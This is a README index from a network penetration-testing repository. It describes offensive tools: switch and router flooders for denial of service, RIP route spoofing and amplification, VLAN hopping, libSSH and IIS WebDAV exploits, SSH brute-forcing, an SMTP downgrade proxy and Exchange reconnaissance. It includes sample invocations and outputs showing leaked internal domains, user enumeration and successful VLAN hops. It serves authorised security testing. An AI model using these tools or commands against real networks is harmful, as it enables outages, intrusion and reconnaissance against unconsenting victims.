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295 lines
15 KiB
Markdown
295 lines
15 KiB
Markdown
## Networks Penetration Testing related scripts, tools and Cheatsheets
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- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
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The effect will be similar to:
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```
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SW2960#show cdp traffic
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CDP counters :
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Total packets output: 361, Input: 11824
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Hdr syntax: 0, Chksum error: 0, Encaps failed: 0
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No memory: 0, Invalid packet: 461858, Fragmented: 0
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CDP version 1 advertisements output: 9, Input: 178
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CDP version 2 advertisements output: 352, Input: 76
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```
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- **`dtpscan.py`** - DTP Scanner - simple script trying to determine type of configured switchport and DTP negotation mode in order to assist in VLAN Hopping attacks. ([gist](https://gist.github.com/mgeeky/3f678d385984ba0377299a844fb793fa))
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- **`exchangeRecon.py`** - This tool connects to the given Exchange's hostname/IP address and then by collects various internal information being leaked while interacting with different Exchange protocols. Exchange may give away following helpful during OSINT or breach planning stages insights:
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- Internal IP address
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- Internal Domain Name (ActiveDirectory)
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- Exchange Server Version
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- support for various SMTP User Enumeration techniques
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- Version of underlying software such as ASP.NET, IIS which
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may point at OS version indirectly
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This tool will be helpful before mounting social engieering attack against
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victim's premises or to aid Password-Spraying efforts against exposed OWA
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interface.
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Sample run:
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```
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PS D:\> python3 .\exchangeRecon.py 10.10.10.9
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:: Exchange Fingerprinter
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Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
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Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
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v0.2
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[.] Probing for Exchange fingerprints...
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[.] Triggering NTLM authentication...
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[.] Probing support for legacy mail protocols and their capabilities...
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======[ Leaked clues about internal environment ]======
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Hostname: 10.10.10.9
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*) SSL Certificate Subject components:
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CN = EXCH01
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*) IIS Version:
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Microsoft-IIS/8.5
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*) ASP.Net Version:
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4.0.30319
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*) Outlook Web App version leaked in OWA HTML source:
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15.0.847
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(fuzzy match: Exchange Server 2013 SP1; February 25, 2014; 15.0.847.32)
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*) Unusual HTTP headers observed:
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- X-SOAP-Enabled: True
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- X-WSSecurity-For: None
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- X-WSSecurity-Enabled: True
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- X-FEServer: EXCH01
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- X-OAuth-Enabled: True
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*) Leaked Internal IP address:
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10.10.10.9
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*) Leaked Internal Domain name in NTLM challenge packet:
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Target Name:
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BANK
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Context:
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Target:
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AD domain name : BANK
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Server name : EXCH01
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DNS domain name : bank.corp
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FQDN : EXCH01.bank.corp
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Parent DNS domain : bank.corp
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Server Timestamp : 19-11-20 Wed 01:35:18 UTC
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OS Ver:
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????????
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Flags:
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- Negotiate Unicode
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- Request Target
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- Negotiate NTLM
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- Negotiate Always Sign
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- Target Type Domain
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- Negotiate NTLM2 Key
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- Negotiate Target Info
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- unknown
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- Negotiate 128
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- Negotiate 56
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*) Exchange supports legacy SMTP and returned following banner/unusual capabilities:
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- X-ANONYMOUSTLS
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- 220 EXCH01.bank.corp Microsoft ESMTP MAIL Service ready at Wed, 20 Nov 2019 02:35:24 +0100
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- X-EXPS GSSAPI NTLM
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- EXCH01.bank.corp Hello [10.10.10.1]
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- XRDST
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*) Results for SMTP User Enumeration attempts:
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- [+] VRFY root returned: (252, "2.1.5 Cannot VRFY user")
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- [-] EXPN root returned: (502, "5.3.3 Command not implemented")
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- [+] MAIL FROM:<test@bank.corp> returned: (250, "2.1.0 Sender OK")
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- [+] RCPT TO:<test@bank.corp> returned: (250, "2.1.5 Recipient OK")
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```
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- **`host-scanner-via-udp.py`** - Running Hosts scanner leveraging ICMP Destination Unreachable response upon UDP closed port packet. Requires root/Administrator privileges. ([gist](https://gist.github.com/mgeeky/eae20db2d3dd4704fc6f04ea233bca9c))
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- **`HSRPFlooder.py`** - Proof of concept _HSRP Coup State: Active_ flooder, trying to provoke Denial of Service within LAN segment due to tunnelling packets to the non-existent gateway that won active-router election. Not working stabily at the moment.
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- **`IBM-MQ-Pentesting-notes.md`** - Busy-man's Practical IBM MQ Penetration Testing cheatsheet, equipped with a couple of handy tips and punch-q installation walkthrough. ([gist](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec))
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- **`iis_webdav_upload.py`** - Microsoft IIS WebDAV Write Code Execution exploit (based on Metasploit HDM's <iis_webdav_upload_asp> implementation). ([gist](https://gist.github.com/mgeeky/ce179cdbe4d8d85979a28c1de61618c2))
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- **`libssh-auth-bypass.py`** - CVE-2018-10993 libSSH authentication bypass exploit
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- **`networkConfigurationCredentialsExtract.py`** - Network-configuration Credentials extraction script - intended to sweep input configuration file and extract keys, hashes, passwords. ([gist](https://gist.github.com/mgeeky/861a8769a261c7fc09a34b7d2bd1e1a0))
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- **`nmap-grep-to-table.sh`** - Script converting nmap's greppable output (-oG) into a printable per-host tables. ([gist](https://gist.github.com/mgeeky/cd3092cf60fd513d786286a21c6fa915))
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- **`nmap-scan-all.sh`** - Simple script to launch nmap scans against given target, using specific options and scripts set.
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- **`pingsweep.py`** - Quick Python Scapy-based ping-sweeper. ([gist](https://gist.github.com/mgeeky/a360e4a124ddb9ef6a9ac1557b47d14c))
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- **`RoutingAttackKit.py`** - Tool collecting various Routing Protocols exploitation techniques in one place, one file, handy for Penetration Testing and Red-Teaming assignments. Currently supporting RIPv1/RIPv2 attacks, planning to cover OSPF, EIGRP, MPLS, IS-IS tricks someday.
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TODO:
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- Add more protocols and their related attacks and fuzzers
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- Add online brute-force attacks against authentication strings
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- Implement sniffer hunting for used protocols and their auth strings
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- Implement semi-auto mode that is first learning a network, then choosing specific attacks
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```
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bash $ python RoutingAttackKit.py
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:: Routing Protocols Exploitation toolkit
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Sends out various routing protocols management frames
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Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
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v0.1
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Available attacks:
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0. 'sniffer' - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.
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1. 'ripv1-route' - RIP Spoofed Route announcement
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2. 'ripv1-dos' - RIPv1 Denial of Service by Null-routing
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3. 'ripv1-ampl' - RIPv1 Reflection Amplification DDoS
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4. 'ripv2-route' - RIPv2 Spoofed Route announcement
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5. 'ripv2-dos' - RIPv2 Denial of Service by Null-routing
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6. 'rip-fuzzer' - RIP/RIPv2 packets fuzzer
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bash # python RoutingAttackKit.py -t rip-fuzzer -v
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:: Routing Protocols Exploitation toolkit
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Sends out various routing protocols management frames
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Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
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v0.1
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[.] Using 192.168.1.14 as local/spoof IP address
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[+] Launching attack: RIP/RIPv2 packets fuzzer
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[.] Generating fuzzed packets for RIPv1...
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[.] Generating fuzzed packets for RIPv2...
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[.] Collected in total 47782 packets to send. Sending them out...
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[+] Started flooding. Press CTRL-C to stop that.
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^C
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bash $ sudo tshark -i eth0 -f 'udp port 520'
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Running as user "root" and group "root". This could be dangerous.
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Capturing on 'eth0'
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1 0.000000000 192.168.1.14 → 224.0.0.9 RIP 60 Request[Malformed Packet]
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2 0.000006657 192.168.1.14 → 224.0.0.9 RIP 60 Request[Malformed Packet]
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3 0.015081856 192.168.1.14 → 224.0.0.9 RIPv2 69 Unknown command (254)[Malformed Packet]
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4 0.015089122 192.168.1.14 → 224.0.0.9 RIPv2 69 Unknown command (254)[Malformed Packet]
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5 0.017368720 192.168.1.14 → 224.0.0.9 RIP 70 Request[Malformed Packet]
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6 0.017372733 192.168.1.14 → 224.0.0.9 RIP 70 Request[Malformed Packet]
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7 0.021995733 192.168.1.14 → 224.0.0.9 RIPv2 70 Request[Malformed Packet]
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8 0.022003639 192.168.1.14 → 224.0.0.9 RIPv2 70 Request[Malformed Packet]
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9 0.043048787 192.168.1.14 → 224.0.0.9 RIP 60 Request[Malformed Packet]
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10 0.043058474 192.168.1.14 → 224.0.0.9 RIP 60 Request[Malformed Packet]
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11 0.050826081 192.168.1.14 → 224.0.0.9 RIPv2 61 Unknown command (64)[Malformed Packet]
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12 0.050831934 192.168.1.14 → 224.0.0.9 RIPv2 61 Unknown command (64)[Malformed Packet]
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```
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- **`smtpAudit.py`** - SMTP Server configuration black-box testing/audit tool, capable of auditing SPF/Accepted Domains, DKIM, DMARC, SSL/TLS, SMTP services, banner, Authentication (AUTH, X-EXPS), conducting user enumerations (VRFY, EXPN, RCPT TO) and others. ([gist](https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa))
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```
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Currently supported tests:
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01) 'spf' - SPF DNS record test
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- 'spf-version' - Checks whether SPF record version is valid
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- 'all-mechanism-usage' - Checks whether 'all' mechanism is used correctly
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- 'allowed-hosts-list' - Checks whether there are not too many allowed hosts
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02) 'dkim' - DKIM DNS record test
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- 'public-key-length' - Tests whether DKIM Public Key is at least 1024 bits long
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03) 'dmarc' - DMARC DNS record test
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- 'dmarc-version' - Checks whether DMARC record version is valid
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- 'policy-rejects-by-default' - Checks whether DMARC uses reject policy
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- 'number-of-messages-filtered' - Checks whether there are at least 20% messages filtered.
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04) 'banner-contents' - SMTP Banner sensitive informations leak test
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- 'not-contains-version' - Contains version information
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- 'not-contains-prohibited-words'- Contains software/OS/or other prohibited name
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- 'is-not-long-or-complex' - Seems to be long and/or complex
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- 'contains-hostname' - Checks whether SMTP banner contains valid hostname
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05) 'open-relay' - Open-Relay misconfiguration test
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- 'internal-internal'
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- 'internal-external'
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- 'external-internal'
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- 'external-external'
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- And about 19 other variants
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- (the above is very effective against Postfix)
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06) 'vrfy' - VRFY user enumeration vulnerability test
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07) 'expn' - EXPN user enumeration vulnerability test
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08) 'rcpt-to' - RCPT TO user enumeration vulnerability test
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09) 'secure-ciphers' - SSL/TLS ciphers security weak configuration
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10) 'starttls-offering' - STARTTLS offering (opportunistic) weak configuration
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11) 'auth-over-ssl' - STARTTLS before AUTH/X-EXPS enforcement weak configuration
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12) 'auth-methods-offered' - Test against unsecure AUTH/X-EXPS PLAIN/LOGIN methods.
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13) 'tls-key-len' - Checks private key length of negotiated or offered SSL/TLS cipher suites.
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14) 'spf-validation' - Checks whether SMTP Server has been configured to validate sender's SPF
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or if it's Microsoft Exchange - that is uses Accepted Domains
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```
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- **`sshbrute.py`** - ripped out from Violent Python - by TJ O'Connor. ([gist](https://gist.github.com/mgeeky/70606be7249a61ac26b34b1ef3b07553))
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- **`smb-credential-leak.html`** - SMB Credentials leakage by MSEdge as presented in Browser Security White Paper, X41 D-Sec GmbH. ([gist](https://gist.github.com/mgeeky/44ce8a8887c169aa6a0093d915ea103d))
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- **`smtpdowngrade.rb`** - Bettercap TCP Proxy SMTP Downgrade module - prevents the SMTP client from sending "STARTTLS" and returns "454 TLS Not available..." to the client. ([gist](https://gist.github.com/mgeeky/188f3f319e6f3536476e4b272ec0fb19))
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- **`smtpvrfy.py`** - SMTP VRFY python tool intended to check whether SMTP server is leaking usernames. ([gist](https://gist.github.com/mgeeky/1df141b18082b6f424df98fa6a630435))
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- **`wpa2-enterprise-utils`** - Couple of scripts that became needed/useful during **WPA2-Enterprise** penetration-testing assignment.
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- **`VLANHopperDTP.py`** - VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request ([gist](https://gist.github.com/mgeeky/7ff9bb1dcf8aa093d3a157b3c22432a0))
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Sample output:
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```
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$ ./VLANHopperDTP.py --help
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:: VLAN Hopping via DTP Trunk negotiation
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Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
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Mariusz B. / mgeeky, '18
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v0.3
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usage: ./VLANHopperDTP.py [options]
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optional arguments:
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-h, --help show this help message and exit
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-i DEV, --interface DEV
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Select interface on which to operate.
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-e CMD, --execute CMD
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Launch specified command after hopping to new VLAN.
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One can use one of following placeholders in command:
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%IFACE (choosen interface), %IP (acquired IP), %NET
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(net address), %HWADDR (MAC), %GW (gateway), %MASK
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(full mask), %CIDR (short mask). For instance: -e
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"arp-scan -I %IFACE %NET%CIDR". May be repeated for
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more commands. The command will be launched
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SYNCHRONOUSLY, meaning - one have to append "&" at the
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end to make the script go along.
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-E CMD, --exit-execute CMD
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Launch specified command at the end of this script
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(during cleanup phase).
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-m HWADDR, --mac-address HWADDR
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Changes MAC address of the interface before and after
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attack.
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-f, --force Attempt VLAN Hopping even if DTP was not detected
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(like in Nonegotiate situation).
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-a, --analyse Analyse mode: do not create subinterfaces, don't ask
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for DHCP leases.
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-v, --verbose Display verbose output.
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-d, --debug Display debug output.
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$ sudo ./VLANHopperDTP.py -i enp5s0f1
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:: VLAN Hopping via DTP Trunk negotiation
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Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
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Mariusz B. / mgeeky, '18
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v0.2
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[+] VLAN Hopping IS possible.
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[>] After Hopping to other VLANs - leave this program running to maintain connections.
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[>] Discovering new VLANs...
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==> VLAN discovered: 10
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==> VLAN discovered: 20
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==> VLAN discovered: 30
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==> VLAN discovered: 99
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[+] Hopped to VLAN 10.: 172.16.10.10
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[+] Hopped to VLAN 20.: 172.16.20.10
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[+] Hopped to VLAN 30.: 172.16.30.11
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[+] Hopped to VLAN 99.: 172.16.99.10
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```
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